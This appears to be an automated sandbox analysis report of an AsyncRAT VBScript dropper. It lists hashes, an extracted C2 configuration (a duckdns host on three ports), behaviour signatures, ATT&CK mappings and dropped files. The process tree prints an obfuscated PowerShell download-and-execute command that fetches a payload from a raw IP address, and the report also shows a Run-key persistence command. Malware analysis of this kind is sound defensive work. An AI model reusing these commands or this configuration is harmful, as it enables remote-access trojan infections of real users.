asyncrat | b72c0371a70cfeab0cfe44b72ef08716f6a3345cce395453e4cf931bf1f603ae

Analysis

max time kernel
260s
max time network
301s
platform
windows11-21h2_x64
resource
win11-20240704-en
resource tags

arch:x64arch:x86image:win11-20240704-enlocale:en-usos:windows11-21h2-x64system
submitted
08-07-2024 17:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

vd.vbs
Size

10KB
MD5

f3a9219e977b293b8cb364f8c8378284
SHA1

6f5ee3933bc669d7af2acccc842c60db60be16f4
SHA256

b72c0371a70cfeab0cfe44b72ef08716f6a3345cce395453e4cf931bf1f603ae
SHA512

3960ed3091dfe3845832af7911c227c3e6f0cdfb97fd404224e1361ccb3d78e7b20a98fd3397ddd7e254113fb81983ca30f90cc28751390da3964a56ff2bfd91
SSDEEP

192:RMVgS5D/dL6hq20J0FeAPZIxOImBYb/QFfW6V5k6uS3N7AVzSXqLFCy+/7lm70OR:RMVgS5D/dL6hq20J0FeAPZIxOImBYb/h

Score

10^/10

asyncrat exenew execution persistence rat

Malware Config

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

ExEnew

mrrobotos.duckdns.org:6606

mrrobotos.duckdns.org:7707

mrrobotos.duckdns.org:8808

Mutex

AsyncMutex_olahsklcnmdnfdsfsdfsd

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
1	1440	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1440	powershell.exe
4832	powershell.exe
4888	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1945933150-1754111531-3454729080-1000\Software\Microsoft\Windows\CurrentVersion\Run\RunScheduledTask = "powershell.exe -ExecutionPolicy Bypass -File \"System.Management.Automation.InvocationInfo.MyCommand.Path\""	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4832 set thread context of 3772	4832	powershell.exe	87
PID 4888 set thread context of 2720	4888	powershell.exe	93

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
1440	powershell.exe
1440	powershell.exe
4832	powershell.exe
4832	powershell.exe
3772	RegSvcs.exe
4888	powershell.exe
4888	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeDebugPrivilege	4832	powershell.exe
Token: SeDebugPrivilege	3772	RegSvcs.exe
Token: SeDebugPrivilege	4888	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3772	RegSvcs.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 1672 wrote to memory of 4040	1672	WScript.exe	78
PID 1672 wrote to memory of 4040	1672	WScript.exe	78
PID 4040 wrote to memory of 1440	4040	cmd.exe	80
PID 4040 wrote to memory of 1440	4040	cmd.exe	80
PID 416 wrote to memory of 4944	416	WScript.exe	84
PID 416 wrote to memory of 4944	416	WScript.exe	84
PID 4944 wrote to memory of 4832	4944	cmd.exe	86
PID 4944 wrote to memory of 4832	4944	cmd.exe	86
PID 4832 wrote to memory of 3772	4832	powershell.exe	87
PID 4832 wrote to memory of 3772	4832	powershell.exe	87
PID 4832 wrote to memory of 3772	4832	powershell.exe	87
PID 4832 wrote to memory of 3772	4832	powershell.exe	87
PID 4832 wrote to memory of 3772	4832	powershell.exe	87
PID 4832 wrote to memory of 3772	4832	powershell.exe	87
PID 4832 wrote to memory of 3772	4832	powershell.exe	87
PID 4832 wrote to memory of 3772	4832	powershell.exe	87
PID 1440 wrote to memory of 2832	1440	WScript.exe	90
PID 1440 wrote to memory of 2832	1440	WScript.exe	90
PID 2832 wrote to memory of 4888	2832	cmd.exe	92
PID 2832 wrote to memory of 4888	2832	cmd.exe	92
PID 4888 wrote to memory of 2720	4888	powershell.exe	93
PID 4888 wrote to memory of 2720	4888	powershell.exe	93
PID 4888 wrote to memory of 2720	4888	powershell.exe	93
PID 4888 wrote to memory of 2720	4888	powershell.exe	93
PID 4888 wrote to memory of 2720	4888	powershell.exe	93
PID 4888 wrote to memory of 2720	4888	powershell.exe	93
PID 4888 wrote to memory of 2720	4888	powershell.exe	93
PID 4888 wrote to memory of 2720	4888	powershell.exe	93

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vd.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1672
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://66.225.254.182:222/reg.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://66.225.254.182:222/reg.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1440

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4944
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.ps1'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4832
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:3772

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2832
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.ps1'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4888
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:2720

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
aa0a32b11dca7b04f4cc5fe8c55cb357

SHA1
00e354fd0754a7d721a270cdc08f970b9a3f6605

SHA256
e336a593bd31921c46757a88a99759f6a33854d0c8b854c0c8f118e5cede1ea1

SHA512
1db91d3540da2c7eb4e151d698f3a9c1d2caed3161c41f1c2c73781a65e9dfc818902f0220c0aa9fc2c617d4851f23f4a576c4e5fe0f40ec78e9ed01c8ad8b30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d122fe511ae9ceaab1d693648305f7d3

SHA1
09b14018e798f792bdf0a7c057d34010fa0d6702

SHA256
f3e87e31a6418596e13b8966ca57df045b8a444cea29090d3448e0922135bcc8

SHA512
d81c18f2e894f52291729622afa7e3958b30a40dfb8d8b9eb6e77af9d6b1c788aade0a729efed087034b12c3c9b10fb51b9d66d9be86979f6a7f1c4717bb5597

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
29b40051adfb163123df2a4a9b8d6e69

SHA1
224585cd4b64ef327bf38e720c9288ac5b3c79ba

SHA256
4920ec14e90e13444d4b0166f443ddb663c861ba0308043f8ad03aee0fa74a11

SHA512
c74e3e7e9331a2670bae9e8acece00faf50b143aee591bea637852f01a0432a5252632893f070f5ca592df4f4fdbb4e8f922250807f63353366d2cfa5a4e5139

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0cumf02h.fjf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.bat

Filesize
295B

MD5
b032577b9070ec04b20b017a13b80fe1

SHA1
456e02f79a9ef827d74a33640a226903915deda3

SHA256
98bde1eda05213754847ccc53758e69bda57349e459adf3c05fc20ce30696eea

SHA512
37524791846a5a4ce3eaeaa5c0982f1a9d052ba773b12e2402a4dd9cedaaf1f438b0e12b9c7d14183263cf0b86b380822ed4210d69e0c875bccdca06ab3f03a4

Download Submit
C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.ps1

Filesize
708KB

MD5
fa0c7ef78bbed4f5a0d05219583f3b6f

SHA1
1c584ee82ef5ac9e1fc9d991312222abbbdb3b66

SHA256
3f57616aad7f78dd1b087414b2219dd704866c340716791c1b20452d4fd87cde

SHA512
339e09113a0b51364bc86824ed8078e192d5810716f523389e9e7a16fd80fc1d23bd2e878979ff281d1f3e60cd5ae50e415c457c04cefa6a815e993cb2f10e16

Download Submit
C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.vbs

Filesize
1001B

MD5
f23c6311937368a391ae7f1a20f353f3

SHA1
53c02ed76746bc693ba51f11f896bbf88338172d

SHA256
4bd33af73be9da6aea7e8c86f1b178d8cf143ddae78379d9350ccb107e4f903d

SHA512
95b2964c414f4193bc20a2f1788d004fba4bf3242099be7fd416e5a88e7c18abdfcb6652083a70ab04d0824892b16991a1bc933de4743d77764988d3f0e4df35

Download Submit
memory/1440-12-0x00007FFD07810000-0x00007FFD082D2000-memory.dmp

Filesize
10.8MB

Download
memory/1440-18-0x00007FFD07810000-0x00007FFD082D2000-memory.dmp

Filesize
10.8MB

Download
memory/1440-0-0x00007FFD07813000-0x00007FFD07815000-memory.dmp

Filesize
8KB

Download
memory/1440-11-0x00007FFD07810000-0x00007FFD082D2000-memory.dmp

Filesize
10.8MB

Download
memory/1440-10-0x00007FFD07810000-0x00007FFD082D2000-memory.dmp

Filesize
10.8MB

Download
memory/1440-9-0x000002CD9E640000-0x000002CD9E662000-memory.dmp

Filesize
136KB

Download
memory/3772-33-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/3772-35-0x0000000005E70000-0x0000000006416000-memory.dmp

Filesize
5.6MB

Download
memory/3772-36-0x0000000005AA0000-0x0000000005B32000-memory.dmp

Filesize
584KB

Download
memory/3772-37-0x0000000005A70000-0x0000000005A7A000-memory.dmp

Filesize
40KB

Download
memory/3772-38-0x0000000006710000-0x00000000067AC000-memory.dmp

Filesize
624KB

Download
memory/3772-39-0x0000000006670000-0x00000000066D6000-memory.dmp

Filesize
408KB

Download
memory/4832-32-0x00000251CA7E0000-0x00000251CA7FA000-memory.dmp

Filesize
104KB

Download